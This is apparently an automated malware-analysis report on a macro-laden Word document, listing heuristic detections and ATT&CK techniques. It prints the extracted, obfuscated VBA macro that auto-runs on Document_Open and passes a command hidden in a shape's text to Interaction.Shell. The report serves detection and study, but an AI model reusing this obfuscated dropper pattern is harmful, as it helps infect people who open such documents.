MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions. Heuristics indicate suspicious calls to cmd.exe and references to PowerShell, suggesting the macro is designed to download and execute a second-stage payload. The obfuscated command line found in the document body further supports this, as it attempts to construct and run commands via cmd.exe.
Heuristics 9
-
ClamAV: Doc.Malware.Dkvn-6774448-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dkvn-6774448-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select nSISYiuFN = Array(GvajSZvcb, HISHpDFa, iJqHIwtBz, Interaction.Shell(FksBGnR, oGtOZGOlUn), jEpISB) Select Case TbSljzKHduzpqwwTwpwtcpw -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7686 bytes |
SHA-256: 555dd5e86504f73fecefdecf8e0561699e7dc92a339c85052c798ce54aef1951 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
170 of 207 identifiers look randomly generated (e.g. 'oSGakhZaVnVibAcFhwGXJznR') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vVkjwkvSXMdL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case KWTsEMlMVaZrQjb
Case 278264801
izvNONSRSffpsvZMFIScoh = 15647715
dZpDVJBfWfhfttwIBamhFXd = 206232366
fLYJNAAuEjoYPwIdATNNuTMM = ChrB(63842020 / ChrB(177751005))
vVlGwJDpwdVIihkoJ = jlddEEDQRFMwLzm
Case 253397297
ZSdsOLGKzfLifJ = 197570628
FZplSRhCjrwdzR = 144590615
rdLWjOUaWSEZshmviv = ChrB(42136575 / ChrB(169369297))
BlIlaLWMdKhJprBwHXqFOOAM = 54965414
End Select
Select Case mHrLBDfNHKZkizaRurY
Case 108624003
ihAXNfboGuJQuQlXz = 182419928
LpfScCzEAKwlzIIEa = 284319200
oXDYAQQUjipuwPFFaDOXUQ = ChrB(183684735 / ChrB(179700084))
HIKIlMKjJnvHQiCMiNVL = CVtDhBLTTXvcusHGL
Case 328051264
iNmcKzKYMLlDGQOFmQ = 33881278
LwMqPAfWmuGWPz = 213215089
PtjFXczIiUoLfm = ChrB(137503372 / ChrB(272668079))
tLfBwMJRnmSEOnH = 235609349
End Select
Select Case MchIuIzcjNXSsMOYqUBkr
Case 96539383
fcoPPhcQVRoAVUsUSPjur = 84278183
KAwJwjMurztCfG = 298442159
vHwBAEMsEwAiULUrTaiPR = ChrB(156798172 / ChrB(205539298))
JXzDcSMNZhlmuLBGoFFwf = ZjdBjFcdQXcMscHIQlmm
Case 60204035
ZiwHYYbLShEfzQaajGlvQN = 62790960
SZzfoTLtUnGuFbhDCFEvI = 85860895
qiqCfBNVMYOowZwWwVLK = ChrB(69762384 / ChrB(64482578))
UIZhsLJNZFvIwwRfrHRu = 145237963
End Select
Select Case HBVspsGJVFUjvboDHGHnrj
Case 23462058
BACkpaCCGdNhQsGk = 72174928
vENabliwBpQiva = 327332961
rppWTuDSaSOGnPzW = ChrB(188715175 / ChrB(269299087))
wwbZRFsZMmbhmkFBQuoiA = vzIWYJmptBGpwO
Case 102386766
YQaVqfwkbWiNjboFk = 324995667
bQuhjmXsZbwlql = 1455998
XHfKPBYuCbYGSNAFBN = ChrB(263201967 / ChrB(2342905))
jriTnYJfkrciFQwEmlar = 340377348
End Select
Select Case wsSAnPirYCwIJILU
Case 27674233
PbpnDoPVONsGZOAuQkNw = 2954644
UGYkuipKIOHrwj = 153462502
pikSBQwRcjIOraHH = ChrB(201097770 / ChrB(94817110))
iOStljDFiziRTXH = iMhADHGHLWaShHzNiZouWkz
Case 252697716
LURuRprjfYvwODbIKiPFlXXz = 139375500
tiMYwMvCsnoNtjjjBiDQU = 150303661
mLCkjMnzSZiwIWHa = ChrB(230187050 / ChrB(7533799))
KoTzoiWBVowEPWVa = 82113668
End Select
Select Case GjkcjJGkizMkDwUvNnwLcSup
Case 110246937
JLHthdMEvoftDW = 159273060
jUNhBNmJKdoKWnovLizvco = 119858129
YzCfQUkZnqmabjDwZwiEo = ChrB(10323525 / ChrB(227213303))
zjhYXdJrCiICLGt = sPWfBOTcbCViFOvXQtjjmM
Case 9983647
juXzbBlTEsLYiCGl = 106851655
wUHfloillRaMDjO = 82052267
GqWBaRCZMCWsOmuQjPjCAJjO = ChrB(275491132 / ChrB(104300877))
tspiKSCAvtEVDEFYlM = 293565433
End Select
Select Case KwHwiaEfohATsKm
Case 104249059
dOcmHaWEjDOUpbufLPrpwvfi = 277815298
QwpknJZbDMMUCVltz = 155618149
KwFFojuvaChiuwqJaOwPEv = ChrB(91474747 / ChrB(158912664))
SrMVDDwHsfSLqBEtNwZWd = YMLLiAIlPkhXVphZW
Case 336958522
aCQXwjNuVrwoCEATAKsZw = 339480927
QidTjOLncalCPHo = 83548506
RFmtTvfSUVhPiZobvAo = ChrB(140387022 / ChrB(107657462))
fKDUOQClMLzQIqNNzmzAL = 296859787
End Select
Set fwXQhJw = vVkjwkvSXMdL.Shapes(GHLKzJhXY + "zfrKdjSboliRsP" + aLmzWb).TextFrame
Select Case HiKkijXCWklCfhziW
Case 149790537
YzArjjfszznuDRAEJUoNmhI = 220025274
WDilKNNiRKUGqiECrZD = 226604202
hlicoNiJFroTQJdwHnlaMl = ChrB(47517525 / ChrB(209027198))
SqkKuHFzlpSEIWAfZMSjnZUa = kmRIdwdwdVXzzKk
Case 229997749
iULswRlumZozKsVJEK = 136346260
qItoFiAchZBhzTvAPNlVfN = 280890869
ozTcBnuzPudWbXnTQI = ChrB(84645488 / ChrB(84284751))
GCrzVuqZzIcRWzFLXbt = 204872700
End Select
FksBGnR = fwXQhJw.ContainingRange + pYZra + WAdwi + fjtDaQm + EXhHs + RIksvA + hWozBZ + QHulb + BPpTUTs + phwct + GjqnTW + RhGZXA
Select Case fZljNMOaHSoHVwD
Case 267035529
EKWsiBOQzwmDDYkrJl = 188158250
dFazdIXszsPwTk = 67724208
RMAXXSPOcWDtDQLL = ChrB(178054060 / ChrB(257679826))
wjZPViVRFipkSOYZzkEdKpM = HEdojhEVjsLcrzfsCB
Case 67846245
mlkifqNbWJhJXEHRBjhY = 197181894
EaDvhAEMbIfjhVTwIs = 128616246
zWKCFmpOrVUlBTjKbkJN = ChrB(148486435 / ChrB(66558280))
YdqXlzCXoFBUhPBquKqUG = 268141770
End Select
Select Case uftddbiHZfJJNdQqOziVDazN
Case 13756428
BHGdJzZhGTFSzSjvFKSaXi = 292483589
ZiVjuUffboZXAwV = 75915834
fXwkwALlIUpvbRTOzDbcp = ChrB(257859883 / ChrB(250242231))
aqIsLuJoGqsKvWdhJwlzqj = XGJAttjtrlJKFrTaOLApkZIT
Case 195440720
tSrBmzqrklCtPuXzAZm = 78216365
qqXXopuOwzpXTAQBqzL = 132187799
HhXVvGRnYjjRADcU = ChrB(196405634 / ChrB(330426758))
vcloMWwuHvJZbrL = 227789740
End Select
Select Case DQdzTNwYXTaNQpDtXSi
Case 68072353
DfdbUNlviGjJTHi = 143598335
qiSkhGPICiYLCzSB = 137308803
lzWzALctMrDwhVYIcErTWYNT = ChrB(114766104 / ChrB(230947217))
kbHQHwIwVrriHInu = EGwDntWOKBcMmChRwsR
Case 33191365
wwZYCRlZkLiipPLmJzi = 242112860
zzfjjoJNIPVpzH = 54676227
ikcloZpuiwnWipujUZ = ChrB(337036562 / ChrB(2466968))
oSccMcwNosHCPiMGzMXIkAn = 6839781
End Select
Select Case iUSTJnJAMhPRCmY
Case 128207520
oSGakhZaVnVibAcFhwGXJznR = 126465045
RiWmIiWmmzwfwnt = 298983547
AoVkjnLUpRwooioHcPuEji = ChrB(258150328 / ChrB(51234546))
OfHBwTdQMnczWlrKRSQawz = JYVXzpEVANwRHETrw
Case 119767122
crMKFiCtRMWhpQNwdd = 314533368
bHRbjaUkGwaRIbVbwOPt = 319748534
mIijGAuFqOCnwUZkafJSnTl = ChrB(32087036 / ChrB(163023046))
vmBPNCijUJzCTTpAH = 84957724
End Select
Const oGtOZGOlUn = 0
Select Case SEYBmYuaNhwjMOQOBlZP
Case 156548604
BUHzjEJLXOzWhArwdOdlcvq = 203906589
bnUrwPLGZDEtooqR = 12289836
ihqjPXDILmmQFdcl = ChrB(53612558 / ChrB(109889042))
UZznPHznEoZmTalIzVuYwn = DZTJzaRDjZdhkitaYRkzUl
Case 339806979
pUViQNsrjjvOwwAMml = 297710826
qtBZDuVGMoVSZAUd = 31446967
mThlBAnfiaRXNjsmdwSvbV = ChrB(289108276 / ChrB(246111297))
sOdowiXIAwafErBmXQup = 269850104
End Select
Select Case wvZOBHjwTtzHMiAPsKGqJ
Case 279396163
QXDTWZWCjXXwzQCavTanT = 338407096
UVjjpEXpYHOJqzoKZwqTk = 269384649
AwpkKXiDOQqjwnpjwJiw = ChrB(281888615 / ChrB(243921983))
McHJBqcfwfpikAT = SqEAszOqWjPsKCqo
Case 103923050
cHCNjMlltDIEFjiwPImkPNO = 110966259
SakVupAStXMKEJrOGFKiSd = 228772881
OmiCfbPtlaOmBQzO = ChrB(49775799 / ChrB(249857901))
JSlLwuWIHEiUosXG = 54171924
End Select
nSISYiuFN = Array(GvajSZvcb, HISHpDFa, iJqHIwtBz, Interaction.Shell(FksBGnR, oGtOZGOlUn), jEpISB)
Select Case TbSljzKHduzpqwwTwpwtcpw
Case 66845561
aoNXDcDURaWiKuXnLpY = 328768502
BWmjwJIFOdfHJGIwkZSwUZ = 148551518
pouYFRAXMlYSaqHSuOC = ChrB(319001623 / ChrB(283779887))
AnPqaPGBVczMrIOkzz = HvYhqVuRzBFWajSnGJOq
Case 242327559
KQvTNzwDKPETjacGY = 140698022
zGAPGZdYVIakHsqlIlXH = 309503405
vrqRGzsKAktJnKKApt = ChrB(237272249 / ChrB(175876657))
vjizbspUUBNliLIZoSij = 66372582
End Select
Select Case WrHjdZklUqGzuj
Case 92144109
sZizuwaIPkhAFEzOfYYXmv = 263927849
PVMDJHjVSXrsouGaRzT = 300639865
jfPqsRWHqzwlDjZjWwIDLii = ChrB(84332485 / ChrB(50245502))
lSwGnbuifpwMRpKNbXu = kKjruBLqjBzDjSj
Case 26697998
jMUqUDjmKjSswHLS = 3173047
alGMlQECistdzJGDrKZQPG = 325095745
kUszitllicGSCXa = ChrB(30806220 / ChrB(254855691))
ZrsjjJluPAskZTnBc = 114530693
End Select
Select Case dnujFVPwUPIAYZnzAsW
Case 189240235
dcOujTVsbBzLXftmQ = 229170596
UppqptWrjJbtLMFAK = 209220425
WCuEtOLoBuuKjJHIdolZBN = ChrB(185197347 / ChrB(253274092))
zImzRfiGiMMakwciEUzow = jDDcMYGkIaHVtGYokOLDFzv
Case 227632093
rJvwsizkHZivoTJAtDmSPCW = 34051183
kidullIVkUPLoQvKk = 250134298
qsvvCDMtJQconpjIwUpVn = ChrB(172246541 / ChrB(175368341))
zuoFnqIfQoOXpnb = 283150074
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.